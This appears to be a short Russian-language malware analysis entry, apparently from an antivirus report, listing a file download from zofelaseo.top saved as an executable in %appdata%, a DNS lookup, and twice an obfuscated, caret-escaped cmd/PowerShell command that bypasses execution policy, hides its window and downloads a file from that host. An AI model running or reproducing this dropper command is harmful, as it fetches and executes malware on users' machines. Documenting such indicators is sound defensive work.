Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWers^H^e^L^l.EXe ^-e^XEC^Ut^iO^npOL^ICy^ bYP^a^SS -^No^PrOFilE ^-W^inD^owstYl^e hi^Dd^EN^ (NeW-^obJe^CT s^Y^st^eM.N^ET^.W^EBCL^iENt)^.D^ownl^o^ad^FIle('http://zofelaseo.top/re...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "p^OWers^H^e^L^l.EXe ^-e^XEC^Ut^iO^npOL^ICy^ bYP^a^SS -^No^PrOFilE ^-W^inD^owstYl^e hi^Dd^EN^ (NeW-^obJe^CT s^Y^st^eM.N^ET^.W^EBCL^iENt)^.D^ownl^o^ad^FIle('http://zofelaseo.top/re...' (со скрытым окном)